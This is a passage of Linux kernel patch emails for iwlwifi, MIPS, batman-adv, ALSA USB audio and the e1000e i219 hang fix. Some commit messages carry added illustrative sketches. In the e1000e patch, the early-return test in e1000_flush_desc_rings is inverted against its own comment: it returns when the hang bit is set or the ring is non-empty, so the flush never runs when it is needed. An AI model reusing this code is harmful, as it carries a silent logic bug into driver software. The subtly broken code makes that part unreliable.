-318,6 +319,7 @@ enum iwl_ucode_tlv_capa { IWL_UCODE_TLV_CAPA_DQA_SUPPORT = (__force iwl_ucode_tlv_capa_t)12, IWL_UCODE_TLV_CAPA_TDLS_CHANNEL_SWITCH = (__force iwl_ucode_tlv_capa_t)13, IWL_UCODE_TLV_CAPA_HOTSPOT_SUPPORT = (__force iwl_ucode_tlv_capa_t)18, + IWL_UCODE_TLV_CAPA_DC2DC_CONFIG_SUPPORT = (__force iwl_ucode_tlv_capa_t)19, IWL_UCODE_TLV_CAPA_RADIO_BEACON_STATS = (__force iwl_ucode_tlv_capa_t)22, IWL_UCODE_TLV_CAPA_BT_COEX_PLCR = (__force iwl_ucode_tlv_capa_t)28, IWL_UCODE_TLV_CAPA_LAR_MULTI_MCC = (__force iwl_ucode_tlv_capa_t)29, diff --git a/drivers/net/wireless/iwlwifi/mvm/fw-api.h b/drivers/net/wireless/iwlwifi/mvm/fw-api.h index 7128379fb621..16e9ef49397f 100644 --- a/drivers/net/wireless/iwlwifi/mvm/fw-api.h +++ b/drivers/net/wireless/iwlwifi/mvm/fw-api.h @@ -171,6 +171,9 @@ enum { /* Thermal Throttling*/ REPLY_THERMAL_MNG_BACKOFF = 0x7e, + /* Set/Get DC2DC frequency tune */ + DC2DC_CONFIG_CMD = 0x83, + /* NVM */ NVM_ACCESS_CMD = 0x88, @@ -1389,6 +1392,49 @@ struct iwl_mvm_marker { __le32 metadata[0]; } __packed; /* MARKER_API_S_VER_1 */ +/* + * enum iwl_dc2dc_config_id - flag ids + * + * Ids of dc2dc configuration flags + */ +enum iwl_dc2dc_config_id { + DCDC_LOW_POWER_MODE_MSK_SET = 0x1, /* not used */ + DCDC_FREQ_TUNE_SET = 0x2, +}; /* MARKER_ID_API_E_VER_1 */ + +/** + * struct iwl_dc2dc_config_cmd - configure dc2dc values + * + * (DC2DC_CONFIG_CMD = 0x83) + * + * Set/Get & configure dc2dc values. + * The command always returns the current dc2dc values. + * + * @flags: set/get dc2dc + * @enable_low_power_mode: not used. + * @dc2dc_freq_tune0: frequency divider - digital domain + * @dc2dc_freq_tune1: frequency divider - analog domain + */ +struct iwl_dc2dc_config_cmd { + __le32 flags; + __le32 enable_low_power_mode; /* not used */ + __le32 dc2dc_freq_tune0; + __le32 dc2dc_freq_tune1; +} __packed; /* DC2DC_CONFIG_CMD_API_S_VER_1 */ + +/** + * struct iwl_dc2dc_config_resp - response for iwl_dc2dc_config_cmd + * + * Current dc2dc values returned by the FW. 
+ * + * @dc2dc_freq_tune0: frequency divider - digital domain + * @dc2dc_freq_tune1: frequency divider - analog domain + */ +struct iwl_dc2dc_config_resp { + __le32 dc2dc_freq_tune0; + __le32 dc2dc_freq_tune1; +} __packed; /* DC2DC_CONFIG_RESP_API_S_VER_1 */ + /*********************************** * Smart Fifo API ***********************************/ diff --git a/drivers/net/wireless/iwlwifi/mvm/ops.c b/drivers/net/wireless/iwlwifi/mvm/ops.c index 2801f97990e6..e4fa50075ffd 100644 --- a/drivers/net/wireless/iwlwifi/mvm/ops.c +++ b/drivers/net/wireless/iwlwifi/mvm/ops.c @@ -281,6 +281,7 @@ static const char *const iwl_mvm_cmd_strings[REPLY_MAX] = { CMD(BINDING_CONTEXT_CMD), CMD(TIME_QUOTA_CMD), CMD(NON_QOS_TX_COUNTER_CMD), + CMD(DC2DC_CONFIG_CMD), CMD(NVM_ACCESS_CMD), CMD(PHY_CONFIGURATION_CMD), CMD(CALIB_RES_NOTIF_PHY_DB), From 42bbd6ecca5065debf99260923689ae52df7230d Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Wed, 3 Jun 2015 09:54:18 +0300 Subject: [PATCH 635/872] iwlwifi: bump the iwlmvm API number to 15 The driver is now ready to handle the -15.ucode. Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-7000.c | 2 +- drivers/net/wireless/iwlwifi/iwl-8000.c | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-7000.c b/drivers/net/wireless/iwlwifi/iwl-7000.c index b40b385ee0df..cc35f796d406 100644 --- a/drivers/net/wireless/iwlwifi/iwl-7000.c +++ b/drivers/net/wireless/iwlwifi/iwl-7000.c @@ -69,7 +69,7 @@ #include "iwl-agn-hw.h" /* Highest firmware API version supported */ -#define IWL7260_UCODE_API_MAX 14 +#define IWL7260_UCODE_API_MAX 15 /* Oldest version we won't warn about */ #define IWL7260_UCODE_API_OK 12 diff --git a/drivers/net/wireless/iwlwifi/iwl-8000.c b/drivers/net/wireless/iwlwifi/iwl-8000.c index 5c08f7035b4f..72040cd0b979 100644 --- a/drivers/net/wireless/iwlwifi/iwl-8000.c +++ b/drivers/net/wireless/iwlwifi/iwl-8000.c @@ -69,7 +69,7 @@ #include "iwl-agn-hw.h" /* Highest firmware API version supported */ -#define IWL8000_UCODE_API_MAX 14 +#define IWL8000_UCODE_API_MAX 15 /* Oldest version we won't warn about */ #define IWL8000_UCODE_API_OK 12 From 5f4c02e2b8c9251c827abf87c4ead4496c67492a Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Wed, 20 May 2015 16:51:28 +0200 Subject: [PATCH 636/872] iwlwifi: mvm: advertise only HW-supported ciphers After the new ciphers CCMP-256 and GCMP-128/256 were implemented, wpa_supplicant could start negotiating them and use the software implementation. This, however, breaks D3 behaviour in the driver since it means that WoWLAN will not be possible. To avoid breaking that feature, advertise only ciphers that the hardware supports. 
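A compact sketch of the pattern behind this change (hypothetical foo_* names, not the mvm code): copy a fixed base set of hardware-backed ciphers into a driver-owned array and append the optional entries only when the hardware or firmware actually supports them, so mac80211 never advertises a software-only cipher.

#include <linux/ieee80211.h>
#include <linux/kernel.h>
#include <linux/string.h>

#define FOO_MAX_CIPHERS 6

struct foo_priv {
	u32 ciphers[FOO_MAX_CIPHERS];
	int n_ciphers;
	bool hw_can_mfp;	/* assumed HW capability flag (made up) */
};

static void foo_build_cipher_list(struct foo_priv *p)
{
	static const u32 base[] = {
		WLAN_CIPHER_SUITE_WEP40,
		WLAN_CIPHER_SUITE_WEP104,
		WLAN_CIPHER_SUITE_TKIP,
		WLAN_CIPHER_SUITE_CCMP,
	};

	BUILD_BUG_ON(ARRAY_SIZE(base) + 1 > FOO_MAX_CIPHERS);

	memcpy(p->ciphers, base, sizeof(base));
	p->n_ciphers = ARRAY_SIZE(base);

	/* advertise the management-frame cipher only when HW handles it */
	if (p->hw_can_mfp)
		p->ciphers[p->n_ciphers++] = WLAN_CIPHER_SUITE_AES_CMAC;

	/* wiphy->cipher_suites / n_cipher_suites would then point at these */
}
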
Signed-off-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 32 ++++++++++++++++----- drivers/net/wireless/iwlwifi/mvm/mvm.h | 2 ++ 2 files changed, 27 insertions(+), 7 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index c46c69f2440f..08367fbc3bc4 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -415,6 +415,12 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm) { struct ieee80211_hw *hw = mvm->hw; int num_mac, ret, i; + static const u32 mvm_ciphers[] = { + WLAN_CIPHER_SUITE_WEP40, + WLAN_CIPHER_SUITE_WEP104, + WLAN_CIPHER_SUITE_TKIP, + WLAN_CIPHER_SUITE_CCMP, + }; /* Tell mac80211 our characteristics */ hw->flags = IEEE80211_HW_SIGNAL_DBM | @@ -441,14 +447,32 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm) hw->uapsd_queues = IWL_MVM_UAPSD_QUEUES; hw->uapsd_max_sp_len = IWL_UAPSD_MAX_SP; + BUILD_BUG_ON(ARRAY_SIZE(mvm->ciphers) < ARRAY_SIZE(mvm_ciphers) + 2); + memcpy(mvm->ciphers, mvm_ciphers, sizeof(mvm_ciphers)); + hw->wiphy->n_cipher_suites = ARRAY_SIZE(mvm_ciphers); + hw->wiphy->cipher_suites = mvm->ciphers; + /* * Enable 11w if advertised by firmware and software crypto * is not enabled (as the firmware will interpret some mgmt * packets, so enabling it with software crypto isn't safe) */ if (mvm->fw->ucode_capa.flags & IWL_UCODE_TLV_FLAGS_MFP && - !iwlwifi_mod_params.sw_crypto) + !iwlwifi_mod_params.sw_crypto) { hw->flags |= IEEE80211_HW_MFP_CAPABLE; + mvm->ciphers[hw->wiphy->n_cipher_suites] = + WLAN_CIPHER_SUITE_AES_CMAC; + hw->wiphy->n_cipher_suites++; + } + + /* currently FW API supports only one optional cipher scheme */ + if (mvm->fw->cs[0].cipher) { + mvm->hw->n_cipher_schemes = 1; + mvm->hw->cipher_schemes = &mvm->fw->cs[0]; + mvm->ciphers[hw->wiphy->n_cipher_suites] = + mvm->fw->cs[0].cipher; + hw->wiphy->n_cipher_suites++; + } hw->flags |= IEEE80211_SINGLE_HW_SCAN_ON_ALL_BANDS; hw->wiphy->features |= @@ -574,12 +598,6 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm) mvm->rts_threshold = IEEE80211_MAX_RTS_THRESHOLD; - /* currently FW API supports only one optional cipher scheme */ - if (mvm->fw->cs[0].cipher) { - mvm->hw->n_cipher_schemes = 1; - mvm->hw->cipher_schemes = &mvm->fw->cs[0]; - } - #ifdef CONFIG_PM_SLEEP if (iwl_mvm_is_d0i3_supported(mvm) && device_can_wakeup(mvm->trans->dev)) { diff --git a/drivers/net/wireless/iwlwifi/mvm/mvm.h b/drivers/net/wireless/iwlwifi/mvm/mvm.h index 255cde41d8b0..2d4bad5fe825 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mvm.h +++ b/drivers/net/wireless/iwlwifi/mvm/mvm.h @@ -820,6 +820,8 @@ struct iwl_mvm { } tdls_cs; struct iwl_mvm_shared_mem_cfg shared_mem_cfg; + + u32 ciphers[6]; }; /* Extract MVM priv from op_mode and _hw */ From 90b712ddabb40c49ca4f68bab07e27aa34c8d2a3 Mon Sep 17 00:00:00 2001 From: "Maciej W. Rozycki" Date: Tue, 2 Jun 2015 17:50:59 +0100 Subject: [PATCH 637/872] MIPS: Avoid an FPE exception in FCSR mask probing Use the default FCSR value in mask probing, avoiding an FPE exception where reset has left any exception enable and their corresponding cause bits set and the register is then rewritten with these bits active. Signed-off-by: Maciej W. 
Rozycki Cc: Joshua Kinard Cc: linux-mips@linux-mips.org Signed-off-by: Ralf Baechle --- arch/mips/kernel/cpu-probe.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/arch/mips/kernel/cpu-probe.c b/arch/mips/kernel/cpu-probe.c index e36515dcd3b2..209e5b76c1bc 100644 --- a/arch/mips/kernel/cpu-probe.c +++ b/arch/mips/kernel/cpu-probe.c @@ -74,13 +74,12 @@ static inline void cpu_set_fpu_fcsr_mask(struct cpuinfo_mips *c) { unsigned long sr, mask, fcsr, fcsr0, fcsr1; + fcsr = c->fpu_csr31; mask = FPU_CSR_ALL_X | FPU_CSR_ALL_E | FPU_CSR_ALL_S | FPU_CSR_RM; sr = read_c0_status(); __enable_fpu(FPU_AS_IS); - fcsr = read_32bit_cp1_register(CP1_STATUS); - fcsr0 = fcsr & mask; write_32bit_cp1_register(CP1_STATUS, fcsr0); fcsr0 = read_32bit_cp1_register(CP1_STATUS); From 940d156f52d27c16f3e0890e82974d500e40e64f Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:31 +0100 Subject: [PATCH 638/872] batman-adv: iv_ogm_aggregate_new, simplify error handling It is just a bit easier to put the error handling at one place and let multiple error paths use the same calls. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 28 +++++++++++++--------------- 1 file changed, 13 insertions(+), 15 deletions(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index c5ba7a798de7..190a64299090 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -642,19 +642,16 @@ static void batadv_iv_ogm_aggregate_new(const unsigned char *packet_buff, if (!batadv_atomic_dec_not_zero(&bat_priv->batman_queue_left)) { batadv_dbg(BATADV_DBG_BATMAN, bat_priv, "batman packet queue full\n"); - goto out; + goto out_free_outgoing; } } forw_packet_aggr = kmalloc(sizeof(*forw_packet_aggr), GFP_ATOMIC); - if (!forw_packet_aggr) { - if (!own_packet) - atomic_inc(&bat_priv->batman_queue_left); - goto out; - } + if (!forw_packet_aggr) + goto out_nomem; - if ((atomic_read(&bat_priv->aggregated_ogms)) && - (packet_len < BATADV_MAX_AGGREGATION_BYTES)) + if (atomic_read(&bat_priv->aggregated_ogms) && + packet_len < BATADV_MAX_AGGREGATION_BYTES) skb_size = BATADV_MAX_AGGREGATION_BYTES; else skb_size = packet_len; @@ -662,12 +659,8 @@ static void batadv_iv_ogm_aggregate_new(const unsigned char *packet_buff, skb_size += ETH_HLEN; forw_packet_aggr->skb = netdev_alloc_skb_ip_align(NULL, skb_size); - if (!forw_packet_aggr->skb) { - if (!own_packet) - atomic_inc(&bat_priv->batman_queue_left); - kfree(forw_packet_aggr); - goto out; - } + if (!forw_packet_aggr->skb) + goto out_free_forw_packet; forw_packet_aggr->skb->priority = TC_PRIO_CONTROL; skb_reserve(forw_packet_aggr->skb, ETH_HLEN); @@ -699,7 +692,12 @@ static void batadv_iv_ogm_aggregate_new(const unsigned char *packet_buff, send_time - jiffies); return; -out: +out_free_forw_packet: + kfree(forw_packet_aggr); +out_nomem: + if (!own_packet) + atomic_inc(&bat_priv->batman_queue_left); +out_free_outgoing: batadv_hardif_free_ref(if_outgoing); out_free_incoming: batadv_hardif_free_ref(if_incoming); From 564891510eb139dd073a0f1a5a7f5641b5bcc238 Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:32 +0100 Subject: [PATCH 639/872] batman-adv: iv_ogm_queue_add, Simplify expressions Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index 190a64299090..159f30af1dc3 100644 --- 
a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -750,13 +750,13 @@ static void batadv_iv_ogm_queue_add(struct batadv_priv *bat_priv, unsigned long max_aggregation_jiffies; batadv_ogm_packet = (struct batadv_ogm_packet *)packet_buff; - direct_link = batadv_ogm_packet->flags & BATADV_DIRECTLINK ? 1 : 0; + direct_link = !!(batadv_ogm_packet->flags & BATADV_DIRECTLINK); max_aggregation_jiffies = msecs_to_jiffies(BATADV_MAX_AGGREGATION_MS); /* find position for the packet in the forward queue */ spin_lock_bh(&bat_priv->forw_bat_list_lock); /* own packets are not to be aggregated */ - if ((atomic_read(&bat_priv->aggregated_ogms)) && (!own_packet)) { + if (atomic_read(&bat_priv->aggregated_ogms) && !own_packet) { hlist_for_each_entry(forw_packet_pos, &bat_priv->forw_bat_list, list) { if (batadv_iv_ogm_can_aggregate(batadv_ogm_packet, From 23badd6dbe5ed66668b0084950c5f66062923e10 Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:33 +0100 Subject: [PATCH 640/872] batman-adv: iv_ogm_orig_update, style, add missing brackets CodingStyle describes that either none or both branches of a conditional have to have brackets. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index 159f30af1dc3..66ac9e85d1ce 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -1032,9 +1032,10 @@ batadv_iv_ogm_orig_update(struct batadv_priv *bat_priv, batadv_orig_node_free_ref(orig_tmp); if (!neigh_node) goto unlock; - } else + } else { batadv_dbg(BATADV_DBG_BATMAN, bat_priv, "Updating existing last-hop neighbor of originator\n"); + } rcu_read_unlock(); neigh_ifinfo = batadv_neigh_ifinfo_new(neigh_node, if_outgoing); From 9f52ee19c3c73763138ccc307858d9877242c0ad Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:34 +0100 Subject: [PATCH 641/872] batman-adv: iv_ogm, Fix dup_status comment Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index 66ac9e85d1ce..23c41d17d999 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -28,7 +28,7 @@ /** * enum batadv_dup_status - duplicate status - * @BATADV_NO_DUP: the packet is a duplicate + * @BATADV_NO_DUP: the packet is no duplicate * @BATADV_ORIG_DUP: OGM is a duplicate in the originator (but not for the * neighbor) * @BATADV_NEIGH_DUP: OGM is a duplicate for the neighbor From 6c4a1622e21fde1a0287ada3bedcbf75ddbc80ac Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:35 +0100 Subject: [PATCH 642/872] batman-adv: iv_ogm, fix coding style The kernel coding style says, that there should not be multiple assignments in one row. 
Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index 23c41d17d999..0019f1bfbe8b 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -64,7 +64,9 @@ static void batadv_ring_buffer_set(uint8_t lq_recv[], uint8_t *lq_index, static uint8_t batadv_ring_buffer_avg(const uint8_t lq_recv[]) { const uint8_t *ptr; - uint16_t count = 0, i = 0, sum = 0; + uint16_t count = 0; + uint16_t i = 0; + uint16_t sum = 0; ptr = lq_recv; From d491dbb68b6efd12a27ee10791e27fc5f2bd02ff Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:36 +0100 Subject: [PATCH 643/872] batman-adv: iv_ogm, fix comment function name This is a small copy paste fix for batadv_ing_buffer_avg. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index 0019f1bfbe8b..9f83137a6514 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -55,7 +55,7 @@ static void batadv_ring_buffer_set(uint8_t lq_recv[], uint8_t *lq_index, } /** - * batadv_ring_buffer_set - compute the average of all non-zero values stored + * batadv_ring_buffer_avg - compute the average of all non-zero values stored * in the given ring buffer * @lq_recv: pointer to the ring buffer * From 044bddb9ca8d49edb91bc22b9940a463b0dbb97f Mon Sep 17 00:00:00 2001 From: Clemens Ladisch Date: Wed, 3 Jun 2015 11:36:42 +0200 Subject: [PATCH 644/872] ALSA: usb-audio: add MAYA44 USB+ mixer control names Add mixer control names for the ESI Maya44 USB+ (which appears to be identical width the AudioTrak Maya44 USB). Reported-by: nightmixes Signed-off-by: Clemens Ladisch Cc: Signed-off-by: Takashi Iwai --- sound/usb/mixer_maps.c | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/sound/usb/mixer_maps.c b/sound/usb/mixer_maps.c index b703cb3cda19..e5000da9e9d7 100644 --- a/sound/usb/mixer_maps.c +++ b/sound/usb/mixer_maps.c @@ -436,6 +436,11 @@ static struct usbmix_ctl_map usbmix_ctl_maps[] = { .id = USB_ID(0x200c, 0x1018), .map = ebox44_map, }, + { + /* MAYA44 USB+ */ + .id = USB_ID(0x2573, 0x0008), + .map = maya44_map, + }, { /* KEF X300A */ .id = USB_ID(0x27ac, 0x1000), From ea114fc27dc0cb9a550b6add5426720feb66262a Mon Sep 17 00:00:00 2001 From: Clemens Ladisch Date: Wed, 3 Jun 2015 11:36:51 +0200 Subject: [PATCH 645/872] ALSA: usb-audio: fix missing input volume controls in MAYA44 USB(+) The driver worked around an error in the MAYA44 USB(+)'s mixer unit descriptor by aborting before parsing the missing field. However, aborting parsing too early prevented parsing of the other units connected to this unit, so the capture mixer controls would be missing. Fix this by moving the check for this descriptor error after the parsing of the unit's input pins. Reported-by: nightmixes Tested-by: nightmixes Signed-off-by: Clemens Ladisch Cc: Signed-off-by: Takashi Iwai --- sound/usb/mixer.c | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/sound/usb/mixer.c b/sound/usb/mixer.c index 4256fdedbd80..8b7e391dd0b8 100644 --- a/sound/usb/mixer.c +++ b/sound/usb/mixer.c @@ -1583,12 +1583,6 @@ static int parse_audio_mixer_unit(struct mixer_build *state, int unitid, unitid); return -EINVAL; } - /* no bmControls field (e.g. 
Maya44) -> ignore */ - if (desc->bLength <= 10 + input_pins) { - usb_audio_dbg(state->chip, "MU %d has no bmControls field\n", - unitid); - return 0; - } num_ins = 0; ich = 0; @@ -1596,6 +1590,9 @@ static int parse_audio_mixer_unit(struct mixer_build *state, int unitid, err = parse_audio_unit(state, desc->baSourceID[pin]); if (err < 0) continue; + /* no bmControls field (e.g. Maya44) -> ignore */ + if (desc->bLength <= 10 + input_pins) + continue; err = check_input_term(state, desc->baSourceID[pin], &iterm); if (err < 0) return err; From ad851fbb73a3d6564707281aa253418ef6aab878 Mon Sep 17 00:00:00 2001 From: Yanir Lubetkin Date: Tue, 14 Apr 2015 02:20:21 +0300 Subject: [PATCH 646/872] e1000e: i219 fix unit hang on reset and runtime D3 Unit hang may occur if multiple descriptors are available in the rings during reset or runtime suspend. This state can be detected by testing bit 8 in the FEXTNVM7 register. If this bit is set and there are pending descriptors in one of the rings, we must flush them prior to reset. Same applies entering runtime suspend. Signed-off-by: Yanir Lubetkin Reviewed-by: Alexander Duyck Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/e1000e/ich8lan.h | 5 + drivers/net/ethernet/intel/e1000e/netdev.c | 102 ++++++++++++++++++++ drivers/net/ethernet/intel/e1000e/regs.h | 1 + 3 files changed, 108 insertions(+) diff --git a/drivers/net/ethernet/intel/e1000e/ich8lan.h b/drivers/net/ethernet/intel/e1000e/ich8lan.h index 770a573b9eea..bf72ef809df8 100644 --- a/drivers/net/ethernet/intel/e1000e/ich8lan.h +++ b/drivers/net/ethernet/intel/e1000e/ich8lan.h @@ -100,6 +100,11 @@ #define E1000_FEXTNVM7_DISABLE_PB_READ 0x00040000 #define E1000_FEXTNVM7_DISABLE_SMB_PERST 0x00000020 +#define E1000_FEXTNVM7_NEED_DESCRING_FLUSH 0x00000100 +#define E1000_FEXTNVM11_DISABLE_MULR_FIX 0x00002000 + +/* bit24: RXDCTL thresholds granularity: 0 - cache lines, 1 - descriptors */ +#define E1000_RXDCTL_THRESH_UNIT_DESC 0x01000000 #define K1_ENTRY_LATENCY 0 #define K1_MIN_TIME 1 diff --git a/drivers/net/ethernet/intel/e1000e/netdev.c b/drivers/net/ethernet/intel/e1000e/netdev.c index 7dd2c11c3f61..76b1a9077fe1 100644 --- a/drivers/net/ethernet/intel/e1000e/netdev.c +++ b/drivers/net/ethernet/intel/e1000e/netdev.c @@ -3787,6 +3787,106 @@ static void e1000_power_down_phy(struct e1000_adapter *adapter) adapter->hw.phy.ops.power_down(&adapter->hw); } +/** + * e1000_flush_tx_ring - remove all descriptors from the tx_ring + * + * We want to clear all pending descriptors from the TX ring. + * zeroing happens when the HW reads the regs. We assign the ring itself as + * the data of the next descriptor. We don't care about the data we are about + * to reset the HW. 
+ */ +static void e1000_flush_tx_ring(struct e1000_adapter *adapter) +{ + struct e1000_hw *hw = &adapter->hw; + struct e1000_ring *tx_ring = adapter->tx_ring; + struct e1000_tx_desc *tx_desc = NULL; + u32 tdt, tctl, txd_lower = E1000_TXD_CMD_IFCS; + u16 size = 512; + + tctl = er32(TCTL); + ew32(TCTL, tctl | E1000_TCTL_EN); + tdt = er32(TDT(0)); + BUG_ON(tdt != tx_ring->next_to_use); + tx_desc = E1000_TX_DESC(*tx_ring, tx_ring->next_to_use); + tx_desc->buffer_addr = tx_ring->dma; + + tx_desc->lower.data = cpu_to_le32(txd_lower | size); + tx_desc->upper.data = 0; + /* flush descriptors to memory before notifying the HW */ + wmb(); + tx_ring->next_to_use++; + if (tx_ring->next_to_use == tx_ring->count) + tx_ring->next_to_use = 0; + ew32(TDT(0), tx_ring->next_to_use); + mmiowb(); + usleep_range(200, 250); +} + +/** + * e1000_flush_rx_ring - remove all descriptors from the rx_ring + * + * Mark all descriptors in the RX ring as consumed and disable the rx ring + */ +static void e1000_flush_rx_ring(struct e1000_adapter *adapter) +{ + u32 rctl, rxdctl; + struct e1000_hw *hw = &adapter->hw; + + rctl = er32(RCTL); + ew32(RCTL, rctl & ~E1000_RCTL_EN); + e1e_flush(); + usleep_range(100, 150); + + rxdctl = er32(RXDCTL(0)); + /* zero the lower 14 bits (prefetch and host thresholds) */ + rxdctl &= 0xffffc000; + + /* update thresholds: prefetch threshold to 31, host threshold to 1 + * and make sure the granularity is "descriptors" and not "cache lines" + */ + rxdctl |= (0x1F | (1 << 8) | E1000_RXDCTL_THRESH_UNIT_DESC); + + ew32(RXDCTL(0), rxdctl); + /* momentarily enable the RX ring for the changes to take effect */ + ew32(RCTL, rctl | E1000_RCTL_EN); + e1e_flush(); + usleep_range(100, 150); + ew32(RCTL, rctl & ~E1000_RCTL_EN); +} + +/** + * e1000_flush_desc_rings - remove all descriptors from the descriptor rings + * + * In i219, the descriptor rings must be emptied before resetting the HW + * or before changing the device state to D3 during runtime (runtime PM). 
+ * + * Failure to do this will cause the HW to enter a unit hang state which can + * only be released by PCI reset on the device + * + */ + +static void e1000_flush_desc_rings(struct e1000_adapter *adapter) +{ + u32 hang_state; + u32 fext_nvm11, tdlen; + struct e1000_hw *hw = &adapter->hw; + + /* First, disable MULR fix in FEXTNVM11 */ + fext_nvm11 = er32(FEXTNVM11); + fext_nvm11 |= E1000_FEXTNVM11_DISABLE_MULR_FIX; + ew32(FEXTNVM11, fext_nvm11); + /* do nothing if we're not in faulty state, or if the queue is empty */ + tdlen = er32(TDLEN(0)); + hang_state = er32(FEXTNVM7); + if ((hang_state & E1000_FEXTNVM7_NEED_DESCRING_FLUSH) || tdlen) + return; + e1000_flush_tx_ring(adapter); + /* recheck, maybe the fault is caused by the rx ring */ + hang_state = er32(FEXTNVM7); + if (hang_state & E1000_FEXTNVM7_NEED_DESCRING_FLUSH) + e1000_flush_rx_ring(adapter); +} + /** * e1000e_reset - bring the hardware into a known good state * @@ -4115,6 +4215,8 @@ void e1000e_down(struct e1000_adapter *adapter, bool reset) spin_unlock(&adapter->stats64_lock); e1000e_flush_descriptors(adapter); + if (hw->mac.type == e1000_pch_spt) + e1000_flush_desc_rings(adapter); e1000_clean_tx_ring(adapter->tx_ring); e1000_clean_rx_ring(adapter->rx_ring); diff --git a/drivers/net/ethernet/intel/e1000e/regs.h b/drivers/net/ethernet/intel/e1000e/regs.h index 85eefc4832ba..200a3126beed 100644 --- a/drivers/net/ethernet/intel/e1000e/regs.h +++ b/drivers/net/ethernet/intel/e1000e/regs.h @@ -38,6 +38,7 @@ #define E1000_FEXTNVM4 0x00024 /* Future Extended NVM 4 - RW */ #define E1000_FEXTNVM6 0x00010 /* Future Extended NVM 6 - RW */ #define E1000_FEXTNVM7 0x000E4 /* Future Extended NVM 7 - RW */ +#define E1000_FEXTNVM11 0x5BBC /* Future Extended NVM 11 - RW */ #define E1000_PCIEANACFG 0x00F18 /* PCIE Analog Config */ #define E1000_FCT 0x00030 /* Flow Control Type - RW */ #define E1000_VET 0x00038 /* VLAN Ether Type - RW */ From 0ffc56464bbbb8e2a78e319a36e1eafcbaaab9d8 Mon Sep 17 00:00:00 2001 From: Yanir Lubetkin Date: Wed, 22 Apr 2015 04:15:01 +0300 Subject: [PATCH 647/872] e1000e: i219 execute unit hang fix on every reset or power state transition After testing various cases, the conclusion is that the fix MUST be executed BEFORE any event that the HW is reset or transition to D3. To fix that I moved the execution to the relevant places but per Alexander Duyck's review, ensure now that the DMA is valid and was not freed before manipulating the ring. 
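A simplified sketch of the resulting ordering (the wrapper function below is hypothetical and only meant as an illustration; e1000_flush_desc_rings() and the mac.ops.reset_hw callback are the real driver entry points):

    /* hypothetical helper, for illustration only: the flush must run while
     * the ring DMA is still mapped, i.e. before reset_hw() and before the
     * Tx/Rx rings are cleaned and their DMA memory is released.
     */
    static void spt_prepare_for_reset(struct e1000_adapter *adapter)
    {
            struct e1000_hw *hw = &adapter->hw;

            if (hw->mac.type == e1000_pch_spt)
                    e1000_flush_desc_rings(adapter); /* descriptors still valid */
            hw->mac.ops.reset_hw(hw);
            /* only after the reset is it safe to clean the rings */
    }
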
